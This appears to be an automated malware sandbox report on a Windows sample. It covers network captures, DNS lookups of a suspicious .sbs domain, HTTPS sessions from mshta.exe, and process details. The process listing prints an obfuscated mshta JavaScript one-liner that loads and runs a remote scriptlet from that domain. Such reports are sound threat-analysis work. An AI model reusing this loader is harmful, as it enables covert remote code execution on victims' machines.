                                                                                                                              Apr 25, 2024 19:21:57.462316990 CEST49700443192.168.2.6104.244.42.65
                                                                                                                              Apr 25, 2024 19:21:57.469245911 CEST49700443192.168.2.6104.244.42.65
                                                                                                                              Apr 25, 2024 19:21:57.469259024 CEST44349700104.244.42.65192.168.2.6
                                                                                                                              Apr 25, 2024 19:21:57.469682932 CEST44349700104.244.42.65192.168.2.6
                                                                                                                              Apr 25, 2024 19:21:57.469749928 CEST49700443192.168.2.6104.244.42.65
                                                                                                                              Apr 25, 2024 19:21:57.470129013 CEST49700443192.168.2.6104.244.42.65
                                                                                                                              Apr 25, 2024 19:21:57.512139082 CEST44349700104.244.42.65192.168.2.6
                                                                                                                              Apr 25, 2024 19:21:57.714561939 CEST44349700104.244.42.65192.168.2.6
                                                                                                                              Apr 25, 2024 19:21:57.714693069 CEST49700443192.168.2.6104.244.42.65
                                                                                                                              Apr 25, 2024 19:21:57.714704990 CEST44349700104.244.42.65192.168.2.6
                                                                                                                              Apr 25, 2024 19:21:57.714771986 CEST49700443192.168.2.6104.244.42.65
                                                                                                                              Apr 25, 2024 19:21:57.714860916 CEST49700443192.168.2.6104.244.42.65
                                                                                                                              Apr 25, 2024 19:21:57.714895964 CEST44349700104.244.42.65192.168.2.6
                                                                                                                              Apr 25, 2024 19:21:57.714921951 CEST49700443192.168.2.6104.244.42.65
                                                                                                                              Apr 25, 2024 19:21:57.714963913 CEST49700443192.168.2.6104.244.42.65
                                                                                                                              Apr 25, 2024 19:21:57.829453945 CEST49701443192.168.2.6104.244.42.65
                                                                                                                              Apr 25, 2024 19:21:57.829488039 CEST44349701104.244.42.65192.168.2.6
                                                                                                                              Apr 25, 2024 19:21:57.829580069 CEST49701443192.168.2.6104.244.42.65
                                                                                                                              Apr 25, 2024 19:21:57.829889059 CEST49701443192.168.2.6104.244.42.65
                                                                                                                              Apr 25, 2024 19:21:57.829909086 CEST44349701104.244.42.65192.168.2.6
                                                                                                                              Apr 25, 2024 19:21:58.060909033 CEST44349701104.244.42.65192.168.2.6
                                                                                                                              Apr 25, 2024 19:21:58.061126947 CEST49701443192.168.2.6104.244.42.65
                                                                                                                              Apr 25, 2024 19:21:58.064378023 CEST49701443192.168.2.6104.244.42.65
                                                                                                                              Apr 25, 2024 19:21:58.064385891 CEST44349701104.244.42.65192.168.2.6
                                                                                                                              Apr 25, 2024 19:21:58.064707994 CEST44349701104.244.42.65192.168.2.6
                                                                                                                              Apr 25, 2024 19:21:58.064820051 CEST49701443192.168.2.6104.244.42.65
                                                                                                                              Apr 25, 2024 19:21:58.065148115 CEST49701443192.168.2.6104.244.42.65
                                                                                                                              Apr 25, 2024 19:21:58.108146906 CEST44349701104.244.42.65192.168.2.6
                                                                                                                              Apr 25, 2024 19:21:58.330760956 CEST44349701104.244.42.65192.168.2.6
                                                                                                                              Apr 25, 2024 19:21:58.330796003 CEST44349701104.244.42.65192.168.2.6
                                                                                                                              Apr 25, 2024 19:21:58.330851078 CEST44349701104.244.42.65192.168.2.6
                                                                                                                              Apr 25, 2024 19:21:58.330873966 CEST49701443192.168.2.6104.244.42.65
                                                                                                                              Apr 25, 2024 19:21:58.330893993 CEST44349701104.244.42.65192.168.2.6
                                                                                                                              Apr 25, 2024 19:21:58.330905914 CEST44349701104.244.42.65192.168.2.6
                                                                                                                              Apr 25, 2024 19:21:58.330923080 CEST49701443192.168.2.6104.244.42.65
                                                                                                                              Apr 25, 2024 19:21:58.331036091 CEST49701443192.168.2.6104.244.42.65
                                                                                                                              Apr 25, 2024 19:21:58.332998991 CEST49701443192.168.2.6104.244.42.65
                                                                                                                              Apr 25, 2024 19:21:58.333009005 CEST44349701104.244.42.65192.168.2.6

                                                                                                                              UDP Packets

                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                              Apr 25, 2024 19:21:55.042365074 CEST5500653192.168.2.61.1.1.1
                                                                                                                              Apr 25, 2024 19:21:55.189063072 CEST53550061.1.1.1192.168.2.6
                                                                                                                              Apr 25, 2024 19:21:57.102253914 CEST5759253192.168.2.61.1.1.1
                                                                                                                              Apr 25, 2024 19:21:57.213151932 CEST53575921.1.1.1192.168.2.6
                                                                                                                              Apr 25, 2024 19:21:57.717788935 CEST6472453192.168.2.61.1.1.1
                                                                                                                              Apr 25, 2024 19:21:57.828336000 CEST53647241.1.1.1192.168.2.6

                                                                                                                              DNS Queries

                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                              Apr 25, 2024 19:21:55.042365074 CEST192.168.2.61.1.1.10xb5eStandard query (0)flinanmansal.roupagucci.sbsA (IP address)IN (0x0001)false
                                                                                                                              Apr 25, 2024 19:21:57.102253914 CEST192.168.2.61.1.1.10xce5eStandard query (0)www.twitter.comA (IP address)IN (0x0001)false
                                                                                                                              Apr 25, 2024 19:21:57.717788935 CEST192.168.2.61.1.1.10xf8dStandard query (0)twitter.comA (IP address)IN (0x0001)false

                                                                                                                              DNS Answers

                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                              Apr 25, 2024 19:21:55.189063072 CEST1.1.1.1192.168.2.60xb5eNo error (0)flinanmansal.roupagucci.sbs104.21.29.223A (IP address)IN (0x0001)false
                                                                                                                              Apr 25, 2024 19:21:55.189063072 CEST1.1.1.1192.168.2.60xb5eNo error (0)flinanmansal.roupagucci.sbs172.67.149.217A (IP address)IN (0x0001)false
                                                                                                                              Apr 25, 2024 19:21:57.213151932 CEST1.1.1.1192.168.2.60xce5eNo error (0)www.twitter.comtwitter.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Apr 25, 2024 19:21:57.213151932 CEST1.1.1.1192.168.2.60xce5eNo error (0)twitter.com104.244.42.65A (IP address)IN (0x0001)false
                                                                                                                              Apr 25, 2024 19:21:57.828336000 CEST1.1.1.1192.168.2.60xf8dNo error (0)twitter.com104.244.42.65A (IP address)IN (0x0001)false

                                                                                                                              HTTP Request Dependency Graph

                                                                                                                              • flinanmansal.roupagucci.sbs
                                                                                                                              • www.twitter.com
                                                                                                                              • twitter.com

                                                                                                                              HTTPS Proxied Packets

                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              0192.168.2.649699104.21.29.2234435224C:\Windows\System32\mshta.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-04-25 17:21:55 UTC310OUTGET /?1/ HTTP/1.1
                                                                                                                              Accept: */*
                                                                                                                              UA-CPU: AMD64
                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                              Host: flinanmansal.roupagucci.sbs
                                                                                                                              Connection: Keep-Alive
                                                                                                                              2024-04-25 17:21:57 UTC836INHTTP/1.1 302 Found
                                                                                                                              Date: Thu, 25 Apr 2024 17:21:57 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: close
                                                                                                                              Set-Cookie: PHPSESSID=a6ldflhu07hl1umbkfk37gbbgl; path=/
                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                              Location: https://www.twitter.com
                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3h%2FTKwL78mEYA%2Bt1WwqcaDE0Wz7RCTjUD3czp1plE8nqEhHo1Zzp%2F3G01otOJRCmv%2BncoFs%2Fo%2BlEA6waxmADNKpm7XBDXwgIn0JCQVwkVtHvgpRtn6rpCOQll%2BW5xuyeelSkn9iOFAvmJYAxbAE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 87a00322de0a450f-ATL
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              2024-04-25 17:21:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              1192.168.2.649700104.244.42.654435224C:\Windows\System32\mshta.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-04-25 17:21:57 UTC295OUTGET / HTTP/1.1
                                                                                                                              Accept: */*
                                                                                                                              UA-CPU: AMD64
                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Host: www.twitter.com
                                                                                                                              2024-04-25 17:21:57 UTC361INHTTP/1.1 301 Moved Permanently
                                                                                                                              perf: 7402827104
                                                                                                                              location: https://twitter.com/
                                                                                                                              cache-control: no-cache, no-store, max-age=0
                                                                                                                              content-length: 0
                                                                                                                              x-transaction-id: 440c83396f020cad
                                                                                                                              x-response-time: 1
                                                                                                                              x-connection-hash: 1f2c5b04eb47a6033623c550abd8be1e807cb7cfeeb11462e6d54a49049f9926
                                                                                                                              date: Thu, 25 Apr 2024 17:21:57 GMT
                                                                                                                              server: tsa_b
                                                                                                                              connection: close


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              2192.168.2.649701104.244.42.654435224C:\Windows\System32\mshta.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-04-25 17:21:58 UTC291OUTGET / HTTP/1.1
                                                                                                                              Accept: */*
                                                                                                                              UA-CPU: AMD64
                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Host: twitter.com
                                                                                                                              2024-04-25 17:21:58 UTC5611INHTTP/1.1 400 Bad Request
                                                                                                                              date: Thu, 25 Apr 2024 17:21:58 GMT
                                                                                                                              perf: 7402827104
                                                                                                                              expiry: Tue, 31 Mar 1981 05:00:00 GMT
                                                                                                                              pragma: no-cache
                                                                                                                              server: tsa_b
                                                                                                                              set-cookie: guest_id_marketing=v1%3A171406571826624135; Max-Age=63072000; Expires=Sat, 25 Apr 2026 17:21:58 GMT; Path=/; Domain=.twitter.com; Secure; SameSite=None
                                                                                                                              set-cookie: guest_id_ads=v1%3A171406571826624135; Max-Age=63072000; Expires=Sat, 25 Apr 2026 17:21:58 GMT; Path=/; Domain=.twitter.com; Secure; SameSite=None
                                                                                                                              set-cookie: personalization_id="v1_noUZc8y9gERVKrIGSeM7/w=="; Max-Age=63072000; Expires=Sat, 25 Apr 2026 17:21:58 GMT; Path=/; Domain=.twitter.com; Secure; SameSite=None
                                                                                                                              set-cookie: guest_id=v1%3A171406571826624135; Max-Age=63072000; Expires=Sat, 25 Apr 2026 17:21:58 GMT; Path=/; Domain=.twitter.com; Secure; SameSite=None
                                                                                                                              set-cookie: ct0=; Max-Age=-1714065717; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; Domain=.twitter.com; Secure; SameSite=Lax
                                                                                                                              content-type: text/html; charset=utf-8
                                                                                                                              x-powered-by: Express
                                                                                                                              cache-control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
                                                                                                                              last-modified: Thu, 25 Apr 2024 17:21:58 GMT
                                                                                                                              content-length: 2344
                                                                                                                              x-frame-options: DENY
                                                                                                                              x-transaction-id: bf5e8b4770445d36
                                                                                                                              x-xss-protection: 0
                                                                                                                              x-content-type-options: nosniff
                                                                                                                              content-security-policy: connect-src 'self' blob: https://api.x.ai https://api.x.com https://*.pscp.tv https://*.video.pscp.tv https://*.twimg.com https://api.twitter.com https://api.x.com https://api-stream.twitter.com https://api-stream.x.com https://ads-api.twitter.com https://ads-api.x.com https://aa.twitter.com https://aa.x.com https://caps.twitter.com https://caps.x.com https://pay.twitter.com https://pay.x.com https://sentry.io https://ton.twitter.com https://ton.x.com https://ton-staging.atla.twitter.com https://ton-staging.atla.x.com https://ton-staging.pdxa.twitter.com https://ton-staging.pdxa.x.com https://twitter.com https://x.com https://upload.twitter.com https://upload.x.com https://www.google-analytics.com https://accounts.google.com/gsi/status https://accounts.google.com/gsi/log https://checkoutshopper-live.adyen.com wss://*.pscp.tv https://vmap.snappytv.com https://vmapstage.snappytv.com https://vmaprel.snappytv.com https://vmap.grabyo.com https://dhdsnappytv-vh.akamaihd.net https://pdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://dwo3ckksxlb0v.cloudfront.net https://media.riffsy.com https://*.giphy.com https://media.tenor.com https://c.tenor.com https://ads-twitter.com https://analytics.twitter.com https://analytics.x.com ; default-src 'self'; form-action 'self' https://twitter.com https://*.twitter.com https://x.com https://*.x.com https://localhost.twitter.com:3443 https://localhost.x.com:3443; font-src 'self' https://*.twimg.com; frame-src 'self' https://twitter.com https://x.com https://mobile.twitter.com https://mobile.x.com https://pay.twitter.com https://pay.x.com https://cards-frame.twitter.com https://accounts.google.com/ https://client-api.arkoselabs.com/ https://iframe.arkoselabs.com/ https://vaultjs.apideck.com/ https://recaptcha.net/recaptcha/ https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/; img-src 'self' blob: data: https://*.cdn.twitter.com https://*.cdn.x.com https://ton.twitter.com https://ton.x.com https://*.twimg.com https://analytics.twitter.com https://analytics.x.com https://cm.g.doubleclick.net https://www.google-analytics.com https://maps.googleapis.com https://www.periscope.tv https://www.pscp.tv https://ads-twitter.com https://ads-api.twitter.com https://ads-api.x.com https://media.riffsy.com https://*.giphy.com https://media.tenor.com https://c.tenor.com https://*.pscp.tv https://*.periscope.tv https://prod-periscope-profile.s3-us-west-2.amazonaws.com https://platform-lookaside.fbsbx.com https://scontent.xx.fbcdn.net https://scontent-sea1-1.xx.fbcdn.net https://*.googleusercontent.com https://t.co/1/i/adsct; manifest-src 'self'; media-src 'self' blob: https://twitter.com https://x.com https://*.twimg.com https://*.vine.co https://*.pscp.tv https://*.video.pscp.tv https://dhdsnappytv-vh.akamaihd.net https://pdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://dwo3ckksxlb0v.cloudfront.net; object-src 'none'; script-src 'self' 'unsafe-inline' https://*.twimg.com https://recaptcha.net/recaptcha/ https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ https://client-api.arkoselabs.com/ https://www.google-analytics.com https://twitter.com https://x.com https://accounts.google.com/gsi/client https://appleid.cdn-apple.com/appleauth/static/jsapi/appleid/1/en_US/appleid.auth.js https://static.ads-twitter.com 'nonce-OTliNjdjYmEtMjUxNS00NzIzLTljMDUtNzAzY2UzNTg0ZDMz'; style-src 'self' 'unsafe-inline' https://accounts.google.com/gsi/style https://*.twimg.com; worker-src 'self' blob:; report-uri https://twitter.com/i/csp_report?a=O5RXE%3D%3D%3D&ro=false
                                                                                                                              strict-transport-security: max-age=631138519
                                                                                                                              cross-origin-opener-policy: same-origin-allow-popups
                                                                                                                              cross-origin-embedder-policy: unsafe-none
                                                                                                                              x-response-time: 12
                                                                                                                              x-connection-hash: 03ccd8c83478b5894e717af3ca4b59793e9bf2d0cd46e08f6acd50f03e656584
                                                                                                                              connection: close
                                                                                                                              2024-04-25 17:21:58 UTC2344INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 0a 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 2c 76 69 65 77 70 6f 72 74 2d 66 69 74 3d 63 6f 76 65 72 22 20 2f 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 2d 6d 73 2d 6f 76 65 72 66 6c 6f 77 2d 73 74 79 6c 65 3a 20 73 63 72 6f
                                                                                                                              Data Ascii: <!DOCTYPE html><html dir="ltr" lang="en"><head> <meta charset="utf-8" /> <meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=0,viewport-fit=cover" /> <style> body { -ms-overflow-style: scro


                                                                                                                              Statistics

                                                                                                                              CPU Usage

                                                                                                                              Click to jump to process

                                                                                                                              Memory Usage

                                                                                                                              Click to jump to process

                                                                                                                              High Level Behavior Distribution

                                                                                                                              Click to dive into process behavior distribution

                                                                                                                              Behavior

                                                                                                                              Click to jump to process

                                                                                                                              System Behavior

                                                                                                                              General

                                                                                                                              Target ID:1
                                                                                                                              Start time:19:21:53
                                                                                                                              Start date:25/04/2024
                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:"C:\Windows\System32\cmd.exe" /c MshtA "JaVAsCrIpT:var _$_WXKH=["\x5a\x53\x46\x4d\113\x38\116","\x73\x63\162\x69\160\164\x3a\x48\x54\x74\x70\x73\x3a\x2f\x2f\x66\x6c\151\x6e\x61\x6e\x6d\x61\x6e\x73\x61\154\56\162\x6f\x75\x70\x61\x67\x75\143\x63\x69\x2e\163\x62\x73\57\x3f\x31\x2f"];try{GetObject(_$_WXKH[1])[_$_WXKH[0]]()}catch(e){};close()"
                                                                                                                              Imagebase:0x7ff740920000
                                                                                                                              File size:289'792 bytes
                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:2
                                                                                                                              Start time:19:21:53
                                                                                                                              Start date:25/04/2024
                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              Imagebase:0x7ff66e660000
                                                                                                                              File size:862'208 bytes
                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:3
                                                                                                                              Start time:19:21:53
                                                                                                                              Start date:25/04/2024
                                                                                                                              Path:C:\Windows\System32\mshta.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:MshtA "JaVAsCrIpT:var _$_WXKH=["\x5a\x53\x46\x4d\113\x38\116","\x73\x63\162\x69\160\164\x3a\x48\x54\x74\x70\x73\x3a\x2f\x2f\x66\x6c\151\x6e\x61\x6e\x6d\x61\x6e\x73\x61\154\56\162\x6f\x75\x70\x61\x67\x75\143\x63\x69\x2e\163\x62\x73\57\x3f\x31\x2f"];try{GetObject(_$_WXKH[1])[_$_WXKH[0]]()}catch(e){};close()"
                                                                                                                              Imagebase:0x7ff6b46e0000
                                                                                                                              File size:14'848 bytes
                                                                                                                              MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:moderate
                                                                                                                              Has exited:true

                                                                                                                              Disassembly

                                                                                                                              Reset < >

                                                                                                                                Executed Functions

                                                                                                                                Function 000002A68F250FC1 Relevance: .0, Instructions: 5COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000003.2110034861.000002A68F250000.00000010.00000800.00020000.00000000.sdmp, Offset: 000002A68F250000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_3_2a68f250000_mshta.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                                • Instruction ID: d8d0be1a9444da1f63af68f80fe832121e0c9dd735a3f5ee132c431e26629a42
                                                                                                                                • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                                • Instruction Fuzzy Hash: FD9002055994079ED45452D10C5D25C5044A38D160FD84481441690148DD4D429A1153
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%